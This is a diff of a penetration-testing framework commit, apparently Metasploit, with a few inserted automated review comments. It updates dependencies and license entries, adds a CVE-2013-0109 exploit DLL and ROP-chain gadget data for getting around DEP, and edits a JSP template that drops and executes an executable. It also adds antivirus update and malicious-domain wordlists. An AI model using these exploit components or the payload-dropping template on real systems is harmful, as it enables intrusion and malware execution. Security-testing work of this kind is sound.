diff --git a/.mailmap b/.mailmap index 459d4a064e..713206e261 100644 --- a/.mailmap +++ b/.mailmap @@ -2,6 +2,7 @@ bturner-r7 Brandon Turner dmaloney-r7 David Maloney dmaloney-r7 David Maloney # aka TheLightCosine ecarey-r7 Erran Carey +farias-r7 Fernando Arias hmoore-r7 HD Moore hmoore-r7 HD Moore jlee-r7 egypt # aka egypt @@ -13,14 +14,16 @@ jvazquez-r7 jvazquez-r7 jvazquez-r7 jvazquez-r7 limhoff-r7 Luke Imhoff shuckins-r7 Samuel Huckins -tasos-r7 Tasos Laskos todb-r7 Tod Beardsley todb-r7 Tod Beardsley +todb-r7 Tod Beardsley +trosen-r7 Trevor Rosen wchen-r7 sinn3r # aka sinn3r wchen-r7 sinn3r wchen-r7 Wei Chen wvu-r7 William Vu wvu-r7 William Vu +wvu-r7 William Vu # Above this line are current Rapid7 employees. Below this paragraph are # volunteers, former employees, and potential Rapid7 employees who, at @@ -72,9 +75,18 @@ OJ OJ Reeves OJ OJ r3dy Royce Davis r3dy Royce Davis +Rick Flores <0xnanoquetz9l@gmail.com> Rick Flores (nanotechz9l) <0xnanoquetz9l@gmail.com> rsmudge Raphael Mudge # Aka `butane schierlm Michael Schierl # Aka mihi scriptjunkie Matt Weeks skape Matt Miller spoonm Spoon M swtornio Steve Tornio +Tasos Laskos Tasos Laskos +TrustedSec trustedsec + +# Aliases for utility author names. Since they're fake, typos abound + +Tab Assassin Tabasssassin +Tab Assassin Tabassassin +Tab Assassin TabAssassin diff --git a/Gemfile b/Gemfile index 26b450c436..9dbb6ba2db 100755 --- a/Gemfile +++ b/Gemfile @@ -2,6 +2,8 @@ source 'https://rubygems.org' # Need 3+ for ActiveSupport::Concern gem 'activesupport', '>= 3.0.0' +# Needed for some admin modules (cfme_manageiq_evm_pass_reset.rb) +gem 'bcrypt-ruby' # Needed for some admin modules (scrutinizer_add_user.rb) gem 'json' # Needed by msfgui and other rpc components 
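Review bot: `gem 'bcrypt-ruby'` in the first Gemfile hunk is added with no version constraint and outside any group, although its comment says only some admin modules (cfme_manageiq_evm_pass_reset.rb) need it. Gemfile.lock in this commit resolves it to 3.1.2, but the Gemfile itself accepts any release, so a later `bundle update` can pull in a version nobody reviewed. A pessimistic constraint such as `gem 'bcrypt-ruby', '~> 3.1.2'` would match how metasploit_data_models is constrained in the same file. Since the gem serves a single module, it is worth confirming that it belongs in the default dependency set rather than an optional group.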
@@ -17,7 +19,7 @@ group :db do # Needed for Msf::DbManager gem 'activerecord' # Database models shared between framework and Pro. - gem 'metasploit_data_models', '~> 0.16.6' + gem 'metasploit_data_models', '~> 0.16.9' # Needed for module caching in Mdm::ModuleDetails gem 'pg', '>= 0.11' end diff --git a/Gemfile.lock b/Gemfile.lock index d7b1bd88e7..d23d0eb424 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -13,6 +13,7 @@ GEM i18n (~> 0.6, >= 0.6.4) multi_json (~> 1.0) arel (3.0.2) + bcrypt-ruby (3.1.2) builder (3.0.4) database_cleaner (1.1.1) diff-lcs (1.2.4) @@ -21,7 +22,7 @@ GEM fivemat (1.2.1) i18n (0.6.5) json (1.8.0) - metasploit_data_models (0.16.6) + metasploit_data_models (0.16.9) activerecord (>= 3.2.13) activesupport pg @@ -61,11 +62,12 @@ PLATFORMS DEPENDENCIES activerecord activesupport (>= 3.0.0) + bcrypt-ruby database_cleaner factory_girl (>= 4.1.0) fivemat (= 1.2.1) json - metasploit_data_models (~> 0.16.6) + metasploit_data_models (~> 0.16.9) msgpack network_interface (~> 0.0.1) nokogiri diff --git a/LICENSE b/LICENSE index acb2f21eca..8079572def 100644 --- a/LICENSE +++ b/LICENSE 
@@ -41,93 +41,10 @@ Copyright: 2004-2005 vlad902 2007 H D Moore License: GPL-2 and Artistic -Files: external/source/meterpreter/ReflectiveDLLInjection/* -Copyright: 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com) +Files: external/source/ReflectiveDLLInjection/* +Copyright: 2011, Stephen Fewer of Harmony Security (www.harmonysecurity.com) License: BSD-3-clause -Files: external/source/meterpreter/source/common/queue.h -Copyright: 1991, 1993 The Regents of the University of California -License: BSD-3-clause - -Files: external/source/meterpreter/source/common/zlib/* external/source/meterpreter/source/server/zlib/* -Copyright: 1995-1996 Jean-loup Gailly and Mark Adler -License: Zlib - -Files: external/source/meterpreter/source/bionic/libc/* -Copyright: 2005-2008, The Android Open Source Project - 2004 by Internet Systems Consortium, Inc. ("ISC") - 1995,1996,1999 by Internet Software Consortium - 1995 by International Business Machines, Inc. - 1997,1998,1999,2004 The NetBSD Foundation, Inc. - 1993 Christopher G. Demetriou - 1983,1985,1989,1993 The Regents of the University of California - 2000 Ben Harris - 1995,1996,1997,1998 WIDE Project - 2003 Networks Associates Technology, Inc. - 1993 by Digital Equipment Corporation - 1997 Mark Brinicombe - 1993 Martin Birgmeier - 1993 by Sun Microsystems, Inc. - 1997, 2005 Todd C. Miller - 1995, 1996 Carnegie-Mellon University - 2003 Networks Associates Technology, Inc. -License: BSD-3-clause and BSD-4-clause - -Files: external/source/meterpreter/source/bionic/libdl/* -Copyright: 2007 The Android Open Source Project -License: BSD-3-clause - -Files: external/source/meterpreter/source/bionic/libm/* -Copyright: 2003, Steven G. Kargl - 2003 Mike Barcroft - 2002-2005 David Schultz - 2004 Stefan Farfeleder - 2003 Dag-Erling Coïdan Smørgrav - 1996 The NetBSD Foundation, Inc. - 1985,1988,1991,1992,1993 The Regents of the University of California - 1993,94 Winning Strategies, Inc. - 1993, 2004 by Sun Microsystems, Inc. 
-License: BSD-2-clause and BSD-3-clause and BSD-4-clause - -Files: external/source/meterpreter/source/extensions/espia/screen.c -Copyright: 1994-2008, Mark Hammond -License: BSD-2-clause - -Files: external/source/meterpreter/source/extensions/priv/server/timestomp.c -Copyright: 2005 Vincent Liu -License: GPL-2 - -Files: external/source/meterpreter/source/extensions/stdapi/server/webcam/bmp2jpeg.c external/source/meterpreter/source/screenshot/bmp2jpeg.c -Copyright: 1994-2008, Mark Hammond -License: BSD-2-clause - -Files: external/source/meterpreter/source/extensions/stdapi/server/railgun/railgun.c -Copyright: 2010, patrickHVE@googlemail.com -License: BSD-2-clause - -Files: external/source/meterpreter/source/pssdk/* -Copyright: microOLAP -License: N/A -Comment: HD Moore holds a single-seat developer license for the Packet Sniffer - SDK library embedded into the Meterpreter Sniffer extension. This - source code is not distributed with Metasploit Framework. - -Files: external/source/meterpreter/source/openssl/* -Copyright: 1998-2002 The OpenSSL Project -License: OpenSSL and SSLeay - -Files: external/source/meterpreter/source/server/posix/sfsyscall.h -Copyright: 2003 Philippe Biondi -License: LGPL - -Files: external/source/meterpreter/source/jpeg-8/* -Copyright: 1991-2010, Thomas G. Lane, Guido Vollbeding -License: BSD-3-clause - -Files: external/source/meterpreter/source/libpcap/* -Copyright: 1990, 1991, 1992, 1993, 1994, 1995, 1996, 1997 The Regents of the University of California. -License: BSD-4-clause - Files: external/source/metsvc/* Copyright: 2007, Determina Inc. License: BSD-3-clause diff --git a/data/exploits/CVE-2013-0109/nvidia_nvsvc.x86.dll b/data/exploits/CVE-2013-0109/nvidia_nvsvc.x86.dll new file mode 100755 index 0000000000..c5de3905b5 Binary files /dev/null and b/data/exploits/CVE-2013-0109/nvidia_nvsvc.x86.dll differ diff --git a/data/ropdb/reader.xml b/data/ropdb/reader.xml new file mode 100644 index 0000000000..2e4c6bd4ea --- /dev/null 
+++ b/data/ropdb/reader.xml 
@@ -0,0 +1,132 @@ + + + + + + 9 + + + + pop ecx # ret + push eax # pop esp # ret + pop eax # ret + ptr to CreateFileMappingA() + call [eax] # ret + HANDLE hFile + LPSECURITY_ATTRIBUTES lpAttributes + DWORD flProtect + DWORD dwMaximumSizeHigh + DWORD dwMaximumSizeHigh + LPCTSTR lpName + pop edi # ret + pop ebp # pop ebx # pop ecx # ret + pop ebx # ret + pop eax # ret + pop ecx # ret + ptr to MapViewOfFile() + mov edx, ecx + pop ecx # ret + call [eax] # ret + pushad # add al, 0 # ret + DWORD dwDesiredAccess + DWORD dwFileOffsetHigh + DWORD dwFileOffsetLow + SIZE_T dwNumberOfBytesToMap + pop edi # pop esi # pop ebp # pop ebx # pop ecx # ret + jmp IAT msvcr80!memcpy + ret + JUNK + memcpy length + JUNK + xchg eax, ebp # ret + pushad # add al, 0 # ret + + + + + + 10 + + + + pop ecx # ret + push eax # pop esp # ret + pop eax # ret + ptr to CreateFileMappingA() + call [eax] # ret + HANDLE hFile + LPSECURITY_ATTRIBUTES lpAttributes + DWORD flProtect + DWORD dwMaximumSizeHigh + DWORD dwMaximumSizeHigh + LPCTSTR lpName + pop edi # ret + pop ebp # pop ebx # pop ecx # ret + pop ebx # ret + pop eax # ret + pop ecx # ret + ptr to MapViewOfFile() + mov edx, ecx + pop ecx # ret + call [eax] # ret + pushad # add al, 0 # ret + DWORD dwDesiredAccess + DWORD dwFileOffsetHigh + DWORD dwFileOffsetLow + SIZE_T dwNumberOfBytesToMap + pop edi # pop esi # pop ebp # pop ebx # pop ecx # ret + jmp to IAT msvcr90!memcpy + ret + JUNK + memcpy length + JUNK + xchg eax, ebp # ret + pushad # add al, 0 # ret + + + + + + 11 + + + + pop ecx # ret + push eax # pop esp # ret + pop eax # ret + ptr to CreateFileMappingA() + call [eax] # ret + HANDLE hFile + LPSECURITY_ATTRIBUTES lpAttributes + DWORD flProtect + DWORD dwMaximumSizeHigh + DWORD dwMaximumSizeHigh + LPCTSTR lpName + pop edi # ret + JUNK + pop ebx # pop esi # pop ebp # ret + pop eax # ret + pop esi # pop ebp # ret + JUNK + pop ecx # ret + call [eax] # ret + pop edx # ret + ptr to MapViewOfFile() + pushad # add al, 0 # pop ebp # ret + DWORD 
dwDesiredAccess + DWORD dwFileOffsetHigh + DWORD dwFileOffsetLow + SIZE_T dwNumberOfBytesToMap + pop edi # pop esi # pop ebp # ret + memcpy address + call eax # ret + memcpy address + xchg eax, ebp # ret + pop ebx # ret + memcpy length + pop edx # ret + pop edx # ret + pushad # add al, 0 # pop ebp # ret + + + \ No newline at end of file diff --git a/data/templates/scripts/to_exe_jsp.war.template b/data/templates/scripts/to_exe_jsp.war.template index 3797d576c1..43fc99d8ea 100644 --- a/data/templates/scripts/to_exe_jsp.war.template +++ b/data/templates/scripts/to_exe_jsp.war.template @@ -39,11 +39,13 @@ if (%{var_proc}.waitFor() == 0) { %{var_proc} = Runtime.getRuntime().exec(%{var_exepath}); } - + File %{var_fdel} = new File(%{var_exepath}); %{var_fdel}.delete(); - } - else + } + else { - Process %{var_proc} = Runtime.getRuntime().exec(%{var_exepath}); + String[] %{var_exepatharray} = new String[1]; + %{var_exepatharray}[0] = %{var_exepath}; + Process %{var_proc} = Runtime.getRuntime().exec(%{var_exepatharray}); } %%> diff --git a/data/vncdll.dll b/data/vncdll.dll deleted file mode 100755 index f0bd4da8a5..0000000000 Binary files a/data/vncdll.dll and /dev/null differ diff --git a/data/vncdll.x64.dll b/data/vncdll.x64.dll index c8d1ff48d8..6922fb2511 100755 Binary files a/data/vncdll.x64.dll and b/data/vncdll.x64.dll differ diff --git a/data/vncdll.x86.dll b/data/vncdll.x86.dll new file mode 100755 index 0000000000..4dd5b516cd Binary files /dev/null and b/data/vncdll.x86.dll differ diff --git a/data/wordlists/av-update-urls.txt b/data/wordlists/av-update-urls.txt new file mode 100644 index 0000000000..39e85cfa08 --- /dev/null +++ b/data/wordlists/av-update-urls.txt 
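Review bot: The argument labels for the CreateFileMappingA() call list `DWORD dwMaximumSizeHigh` twice in each of the three version blocks (9, 10 and 11). The API's fifth parameter is dwMaximumSizeLow, so the second label should read `DWORD dwMaximumSizeLow`. The memcpy label wording also differs between blocks (`jmp IAT msvcr80!memcpy` versus `jmp to IAT msvcr90!memcpy`) and should be made uniform. The file ends without a trailing newline, and because the XML markup is not visible in this view, these points cover the label text only.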
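Review bot: The first branch still calls `Runtime.getRuntime().exec(%{var_exepath})` with a single String (the context line after `waitFor() == 0`), so only the `else` path gets the array form this change introduces. The single-String overload splits its argument on whitespace, which is presumably the reason for the change, so the two branches now behave differently for a path containing a space. Using the same form in both, e.g. `exec(new String[] { %{var_exepath} })`, would also replace the two-line array setup. The scriptlet starts and ends outside the hunk, and the hunk mixes whitespace-only edits with the behavioural one.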
@@ -0,0 +1,28 @@
+www.es-web.sophos.com
+www.es-web.sophos.com.edgesuite.net
+www.es-web-2.sophos.com
+www.es-web-2.sophos.com.edgesuite.net
+www.dnl-01.geo.kaspersky.com
+www.downloads2.kaspersky-labs.com
+www.liveupdate.symantecliveupdate.com
+www.liveupdate.symantec.com
+www.update.symantec.com
+www.update.nai.com
+www.download797.avast.com
+www.guru.avg.com
+www.osce8-p.activeupdate.trendmicro.com
+www.forefrontdl.microsoft.com
+es-web.sophos.com
+es-web.sophos.com.edgesuite.net
+es-web-2.sophos.com
+es-web-2.sophos.com.edgesuite.net
+dnl-01.geo.kaspersky.com
+downloads2.kaspersky-labs.com
+liveupdate.symantecliveupdate.com
+liveupdate.symantec.com
+update.symantec.com
+update.nai.com
+download797.avast.com
+guru.avg.com
+osce8-p.activeupdate.trendmicro.com
+forefrontdl.microsoft.com
diff --git a/data/wordlists/malicious_urls.txt b/data/wordlists/malicious_urls.txt
new file mode 100644
index 0000000000..0b0acc439c
--- /dev/null
+++ b/data/wordlists/malicious_urls.txt
@@ -0,0 +1,3968 @@ +00398d0.netsolhost.com +0414qd.com +0577rc.net +0koryu0.easter.ne.jp +0zz0.com +1-vinstaller.com +1.michaelwilsonmusic.com +100megabyte.com +11.lamarianella.info +12318wh.com +123mediaplayer.com +123mplayer.com +125search.com +127.co.kr +12danji.com +1322.com +1364ih5d6.ni.net.tr +137158.cn +1860php.com +197.242.148.159-static.reverse.softlayer.com +199.193.232.43-static.reverse.softlayer.com +19tenco.com +1clickmoviedownloader.info +1k.pl +1miem.org +1wstdfgh.organiccrap.com +2.refiinc.com +2.wholesalepbm.com +2.zerocostfha.com +2007scapebot.net +200mail.com +2010103.com +212.124.115.216-static.reverse.softlayer.com +21tx.com +2345.cn +249.strangled.net +24sky.co.kr +24ut1.ru +26923.com +28ytls60.ni.net.tr +2wnpf.tld.cc +3.bluepointmortgage.com +3.coolerpillow.com +3.photowallrental.com +321vn.sites.uol.com.br +3322.org +360edu.com +360tpcdn.com +365idc.com +3apa3a.tomsk.tw +3dmodelagem.com +3dvideodownload.com +3herculeans.com +3kinds.net +3lsoft.com +3rbw.com +3rddownload.com +3shitou.com +3x.ro +4.androidislamic.com +4.collecorvino.org +4.dlevo.com +4.e-why.net +4.luca-volonte.org +4.newenergydata.biz +4.newenergydata.info +4.periziavela.com +4.pianetapollo.com +4.whereinitaly.com +4.whereinlazio.com +4.whereinliguria.com +4.whereinlombardy.com +4.whereinmilan.com +4.whereinmolise.com +4.whereinpiemonte.com +4.whereinpuglia.com +4.whereinsardegna.com +4.whereinsicilia.com +4.whereinsicily.com +4.whereintoscana.com +4.whereintrentinoaltoadige.com +49mp3.com +4k5.com +4kids2kids.net +4office.com +4sinstalls.info +4yourcsecret.co.tv +5.attilacrm.com +5.chinottoneri.com +5.estasiatica.com +5.eventiduepuntozero.com +50eee9e483691.daveandterra.com +50efa6486f1ef.skydivesolutions.be +50webs.com +510799b627b3d.bidbandit.co.uk +5107a120d92e0.e-chore.co.uk +5108134940e79.wheelchairsforindia.com +512.ir +51web8.net +52z.com +55555.to +58toto.com.cn +6.bbnface.com +6.bbnfaces.net +6.bbnsmsgateway.com +6.grapafood.com +6.mamaswishes.com 
+6.negutterking.org +614.hol.es +63.net +69-64-92-87.dedicated.abac.net +705forum.com +70mmcinema.net +798kan.com +7file.co.kr +800cdn.com +8095.net +866dy.com +866rfgroup.com +878help.com +87yd.com +888casino-luckystar.net +8index.com +8mm.hiho.jp +9.bohmamei.com +9.hclinstitute.com +9.i-am-a-pussy.com +9.m2humannexus.com +91.com +91wan.com +9yuonline.com +a.update.51edm.net +aa0987.com +aaedeusa.rubbermarbles.com +aangedraafdhypothecated.beautysupplytraining.com +ab-tools.com +ab18toys.mobi +abel_guimaraes.sites.uol.com.br +abelarddo.com +abgycwu.net +abk.premeditation.asia +about-home-security.com +aboutfacetheatre.com +acapellakan.pupu.jp +accgame.com +accu.rhetoricalpoems.asia +accuratedownload.com +achren.org +aconfideeeeeracia200.com +actes-lyon.org +actionpreventive.com +activeadultproperties.com +actsforcharged.com +ad-spider.com +ad.inewsweek.cn +adahb.org +adaptec.com +adcdls.com +addendam.co.kr +addictnetwork.net +addoncommon.info +addonspotbox.info +adebola.grandshost.com +adgallery.whitehousedrugpolicy.gov +adilsondocavacoaulasvianet.com +adlice.com +adlrma.com +admarcontabil.sites.uol.com.br +admincareers.com +adminroomsoftware.com +adobe-flashplayer.com +adobe-plugin.tk +adobeinfo.org +adrianobenigno.com.br +adsea.net +adserving.favorit-network.com +adv-tecsystems.net +advancedregistryclear.com +advantig.com +advombat.ru +advsys.net +advwinntdigiplus.net +adware-2009.com +ae-21-70.car1.losangeles1.level-3.us +ae-21-70.car1.newyork1.levei-3.net +ae-63-26.cbr2.losangeles1.edge02.net +aeiegypt.com +aerolito.com.br +afa15.com.ne.kr +affinity.modeldns.com.au +afreecodec.com +agame.ca +agassy.net +agility-ml.com +agostinhoaugusto.sites.uol.com.br +agrar24.at +agriculturetoday.in +agriexpo.in +ahrens-kind.de +ahsapamerikankapi.com +aigotek.com +airdream.ru +airedaleterrier.cz +airknorflystart.ai.funpic.de +ajguazzelli.sites.uol.com.br +ak-rallyteam.home.pl +akce.ambergold.cz +akebono.under.jp +aksteachingsolution.com +akweng.com +alabaka.net 
+alaluzdelabiblia.org +alanjsaffron.com +alarmsoft.com +ale.goncal.sites.uol.com.br +algumfamiliareveion2010.xpg.com.br +alipay.com +alissonluis-musico.sites.uol.com.br +alizafashion.com +alkarmel.com.jo +allalla.com +allegro.gmb.pl +allenskitchenandbath.com +allfiles100.com +allfiles107.com +allfiles108.com +allfiles109.com +allfiles110.com +allfiles118.com +allfortune777.biz +alliedcarrentals.com +alllinuxapplicationsy.asia +allmapsoft.com +allmyfiles102.com +allmyfiles115.com +allmyfiles118.com +allmyfiles15.com +allpopup.com +allthegate.com +allvideo.org.uk +allwebjobs.com +allxscan.tk +alotibi.panadool400.com +alotimg.com +alschsa.com +alseeonline.co.kr +alternativateam.cz +altervista.org +alyac.co.kr +ambergold.cz +amicitreni.org +amods.net +amoninst.com +amonisto.com +ampala.net +ampfuschini.sites.uol.com.br +amsterbtn.vv.cc +amu.adduraddonhere.info +amu.boxinstallercompany.info +amu.brandnewinstall.info +amu.helpyourselfinstall.info +amu.twobox4addon.info +an-inconvenient-truth.com +anaf.com.br +analxxxclipsyjh.dnset.com +anappz.com +ancamera.co.kr +andrea_antonacci.sites.uol.com.br +androidonlines.com +andysgame.com +aniani.info +animatedchristmasscreensavers.com +anketguidevemersion.com +anonymizercom.com +antalya.ru +antfraud.co.cc +antoine-lapeyre.com +anwaltskanzlei-drischmann.de +anydaycomstwe.net +anysecu.net +ao1004.com +aonicgamers.net +aoom.com.au +aparecida.tiburcio.sites.uol.com.br +apcig.org +apfelfeed.de +app.mkspace.biz +appcentric103.com +appet.ru +applicationscenterforally.asia +applicationscreditforally.asia +applicationsforallsitey.asia +applicationsgroupforally.asia +appline.ieguide.co.kr +appzspotdown.info +aq8.cc +aquageo.cl +aquavpn.com +aqvasex.tk +arabpetroleum.net +aralgood.com +araujofernao.sites.uol.com.br +arcodep.com +arestidessilva.sites.uol.com.br +arnondemello.com.br +arriowzzetobe.net +arrudam.zeca.sites.uol.com.br +arsinco.com.br +arta.romail3arnest.info +artemisaalves.sites.uol.com.br +artick.wen.ru +artisanwonder.com 
+artvideo3d.ru +asanixcorp.com +asassis.sites.uol.com.br +asearch.co.kr +asfitness.com +asformations.fr +ashtartours.com +ask.com +askadresi.net +askmeaboutcctv.com +asoftwareplus.com +asoftwareupdate.com +asoftwarez.com +asp.spinchats.com +aspenhonda.com +assarbad.net +assesi.com +asso69110.org +associatesexports.com +astaloscojonesbck.net.in +astexisnew.net +at-tech.co.il +atappz.com +atdheapp.com +atdhenetapptv.com +atdhenettvapp.com +atelier3a.fr +athena.vistapages.com +atishoobeauty.com +atlog.com.sg +atolye4.com +audio4fun.com +audiochannel.net +aumimo.sites.uol.com.br +aurummulier.pl +auto-free.com +autodopravaskoda.cz +autohideip.com +autoitscript.com +autokd.cz +automatedaffiliatemachine.com +automsn.hotmail.ru +avanquest.com +avatar.xaa.pl +avirasecureserver.com +avsm.ws +aworldbd.com +axis.my +ayrtravellersmotel.com.au +aysport.net +azurial.net +b3enzcanadaa.com +b6canadas4atea.com +babblepulse.com +babos.scrapping.cc +bacguarp.com +backupworld.biz +baddosky.nazuka.net +badgefortime.net +badgewinners.com +badgewinners.net +baduqq.com +baidu.co.th +baidu.com +bananamamor.ru +bandofbros.us +banks.co.il +banner.eurogrand.com +bapujds.thehavazoo.com +barackobamainfo.com +barakair2.com +bargainracks.co.uk +barzev.net +basitbellitalianart.eu +batangicon.net +bauerpetr.cz +bb1.sandco.org +bbb-accredited.net +bbc-world-news.co.uk +bbce-legalconsultancy.com +bbcnews-money.net +bbdignite.com +bbe.rauzqivu.ru +bbs.6858dz.com +bbs.bjchun.com +bbwscimanuk.pdsda.net +bcozindia.com +bde.be +be-funk.com +beachfiretald.com +beautifulbritain.co.uk +beckandpartners.com +begin.pro +beilequ.com +beingpcky.com +beisentse.net +beldiplomcom.75.com1.ru +bellefonte.net +bellwetherlabradors.com +belnialamsik.ru +bemarcondes.sites.uol.com.br +benini.xpg.com.br +benzavenue.com +berezutskii.narod.ru +beromder56.com +berrybots.net +best-new-zip-my.info +best-trololo.com +bestcodecpackapp.com +bestemoticon.com +bestfilesdatak.asia +bestfilesdatay.asia +bestnewzipmy.info 
+bestshareware.net +bestvaccine.co.kr +betivervega.com +betterinstaller.com +bezproudoff.cz +bff.7oorq8.com +bff4.7oorq8.com +bgdir.org +bggranite.ca +bh-china.cn +bh.popredirect.com +bhagidari.net +bharattruck.com +biancabgm.sites.uol.com.br +bibleversepuzzles.com +bidexbank.ohost.de +big-dadd.com +bigdogtoner.com +bigel.ru +bigfile.co.kr +bigfile.or.kr +bigmama.fr +bigs-shop.com +bikebilgisayar.com +bilico.sites.uol.com.br +bill.4java.ca +billing.hostwaves.com +bingb.5webs.net +binsetup.com +biokovoholidays.com +biotic.ro +birchcompany.in +bisrv.com +bitchat.org +bizall.co.jp +biznessmanonline.bi.funpic.de +bizserviceszero.com +bizzibeans.net +bj04.com +blackengineering.co.uk +blacknite.eu +blackroot.pro +bleee.eu +blessedbiz.bl.funpic.de +blessingworld.co.in +blessmyhustles.com +blog.jekotia.net +blue-cardinal.com +bluecutsystem.com +blueone.net +blztotal.sites.uol.com.br +bmalkids.eu +bmwfanatics.eu +boanscan.co.kr +boansite.co.kr +boansolution.co.kr +boansystem.co.kr +boanupdate.co.kr +boanweb.co.kr +bobkilasadareta.su +bokkinfh.php5.cz +bonata.pl +bookingsessential.com +bookofkisl.com +bookr24.ru +bootstrap-js.net +bora369.com +botmasterlabs.net +botoxpatient.com +bouncer.bot.nu +boykusumabrata.com +bp.olofyj.ru +bplaced.com +brainblock.com +brasstradingpty.com +bravetools.net +brianhenshaw.topcities.com +bride1.com +brightchoicelighting.com +britishracingsystems.com +broodmother.com +brop.be +bropbrap.be +brospecial.net +brothersoft.com +buffalogoesout.com +buffingtonlaw.com +bufflomens.me.uk +bufur.cz +buldir.com +bulletproof-web.com +bundesregeirung.de +bundledmonkey.com +bunker.org.ua +bunyabilla.com +burgermannnn7719.biz +buruntuyr.com +buttonguide.co.kr +buyfrome.bu.funpic.de +buyinfo-centreq.tk +buyinfo-centreqcv.tk +buypaymer.so +buyphrobi.com +by98.com +bytessence.com +c-71-63-136-200.hsd1.mn.comcast.net +c15.bkla.pw +c5.zhga.biz +cabanasdopontal.com.br +cacajose.sites.uol.com.br +cacl.in +caderix.com +cafe24.com +cairujp.sites.uol.com.br 
+cakircali.net +calleite.sites.uol.com.br +callingcardsinstantly.com +calmonstarn.co.uk +cam49.fr +cameraweb-cartoon.tk +camposdelapampa.com.ar +camsapoolt2.biz +canadagames.theunsignedsounds.com +canichesycia.com.ar +cannabisbeer.com +cannabislyric.com +cannabispicture.com +cannabisrecipe.com +cannabisvaporizer.com +cannabisvodka.com +canoede.info +canyonshadowlabs.com +capfile.co.kr +capitalcurbing.com +capodeicapi.eu +card.org.in +carebathe.com +carepc.co.kr +carlosfalavina.sites.uol.com.br +carlosvieira1960.sites.uol.com.br +carol.omoura.sites.uol.com.br +cartethont.com +casateixeira.sites.uol.com.br +cashcasinoworld.com +cashmandevelopment.com +cashupnew.com +casinorewards.com +castleempire.com +casualcare.net +catalactica.org.ro +cathyandjeff.com +catocife.sites.uol.com.br +catrootsz.com +catsshow2online.info +cavitelife.com +cceinfo.com.br +ccgp.gov.cn +ccgslb.net +cctae.com +cdfrj.com +cdfurniture.com.my +cdn-services.com +cdn77.net +cdndp.com +celgmed.com.br +celikleraksesuar.com +centerline.co.kr +cerec.ru +certkey.or.kr +ceskarepublika.net +ceskyjiretin.cz +cetac.sites.uol.com.br +cgermanoferreira.sites.uol.com.br +cgito.net +chachating.com +champlus.co.kr +chanywa.com +charteredcapitalbk.com +checknews.5webs.net +checkspeed.co.kr +cherie-boheme.com +cheriosmarketing.net +cherrybombpetition.org +cherryfun.com +chesterfield.net.in +chinabuznessmen.ch.funpic.de +chinadatasoft.com +chinahourse.ch.funpic.de +chinakofo.com +chol.com +cholifo.info +chonbuk.ac.kr +chris-pc.com +christmasgiftforkids.com +chrome-update.org +ciistudies.com +cimrman.org +cincyty.com +cinerak.com +ciscoc.ru +cistus.cz +citus.co.kr +civicfootprint.net +civilserve.com +classificadosgazeta.com.br +claudia.reinaldo.sites.uol.com.br +claudiomaia1969.sites.uol.com.br +cleanwaters.sites.uol.com.br +clickmon.co.kr +clickrate.com.au +clickvaccine.co.kr +client.parallelgeo.com +clientfiles23.pw +clinicvaccine.co.kr +closedir.com +cloudapp.net +cloudfile11.com +cloudfront.net +cloudsvr12.com 
+cloudsvr206.com +cloudsvr22.com +cloudsvr30.com +cloudsvr305.com +cloudsvr31.com +cloudsvr32.com +cloudsvr40.com +cloudsvr41.com +cloudsvr46.com +cloudsvr518.com +clping.com +cmbpupin.sites.uol.com.br +cmdi.gov.cn +cms1500assistant.com +cndbase.ru +cntajomar.es +cofeb13east.com +cog.hellofuck.co.vu +colossusmetin2.eu +com.ne.kr +com41miss.rr.nu +comercialdr.sites.uol.com.br +coming1.007webs.com +coming2.007webs.com +coming3.007webs.com +coming4.007webs.com +coming5.007webs.com +companionposes.net +compass-company.ru +compfixer.net +compforallnew.info +complainpaywall.net +compstorage.info +computo164.laweb.es +condinstalls.biz +conds.ru +conduit-download.com +conduit-services.com +conduit.com +config.shopperreports.com +congrbasering.su +conqueronline-co.91.com.tqpoint.com +consumerfocusedconspicuously.net +consumersshow.net +cont24x7host.org +contatoseguranca.hol.es +contexrender.com.au +controlpc.co.kr +convert-videos.net +cookingwithmarijuana.com +cool-screensavers.com +coolbmw.ru +coolestmovie.info +coolfreestudio.com +coolwaremax.com +costcopainlessly.org +count.fuckunion.com +counter-1.adscounter.com.ua +cowon.com +cpablue.com +cpiresmartins.sites.uol.com.br +cplrenovationsinc.com +cpudln.com +cr173.com +cracks.vg +crackspider.us +crackzone.net +creamlonsarter.co.uk +createlognet.co.uk +creativeimagephotographics.com +credocatholic.com +critical-update-server1.com +crogsz.sites.uol.com.br +crossgl.com +crossrider.com +crossunltd.npage.de +crowncraftsinc.com +crowniih.com +crownike2010-uol.sites.uol.com.br +crx-web.com +crystalgraphics.com +cs-copez.com +csaaac.com +cskrf.com +csoakley.com +csson.qc.cx +cswilliamsburg.com +cubetree.co.kr +cumfaci.eu +customer.appmys-ups.com +customer.appmys-ups.org +customers.invoice-appmy.org +customgraphicproducts.com +customsboysint.com +customyarns.com +cwgministries.org +cwmgaming.com +cwvmtudybwvr.myfw.us +cyber-ta.org +cyberlandia.org +cygnus.inc.cl +cyuqtaz.com +cznshuya.ivnet.ru +czout.wuwykym.net +d-h.st 
+d0wnohqimjjedf0jq.net +d0wnpzivrubajjui.com +d3moncorp.co.uk +dabtune4.eu +dada.hanztrading.com +dadajozo.sk +dadrbacau.ro +dafapunter.com +dajizzum.com +damagalko.ru +danckert.dk +dangcem.com +dape.net +dargs.su +darkboard.net +darker.in.ua +dashuxmaecrme.com +dashuxmaecrmecia.ws +data.sfvolleyball.net +datarecoveryoxfordshire.co.uk +dattinggate.com +daum.net +davebarry.net +davedownloads.info +dawnframing.com +day27.007webs.com +day27s.5webs.net +day27x.5webs.net +dazzlefly.ru +dbgo.com +dcanscapital.co.uk +ddcsa.co.za +dddq.net +ddooo.com +deal-spy.com +deanwallaceplumbing.com.au +debitor.su +deborenttt.co.uk +decoderactive.com +deep-shadows.com +defencevaccine.co.kr +delavilla.com.ar +deletespyware-adware.com +deltaboatraces.net +deltariverhouse.net +demandmeticul.net +demoralization.ru +dentalsg.sites.uol.com.br +dentbeen.eu +denturesolutionsmaine.com +depaulamdp.sites.uol.com.br +depistage-precoce-vih.com +derjismutik.info +dertoprteiopolo.com +des84.com +desbloquear-celular.com.ar +descubretuser.com +deskthemepacks.com +desportonalinha.com +destino-crew.com +detadomain.su +dettymoodz.com +devpia.com +dewell.ru +dfudont.ru +dhofarinsurance.com +diablo3keygen.net +diamondjewelry1.com +diaoyudao56.com +diaryofagameaddict.com +digiaquascr.com +digitalriver.com +dikolas.homedns.org +dimenal.com.br +diminisheddatatransfer.net +dimsnetwork.com +dinamicotelemercadeo.com +dineromode.dvrdns.org 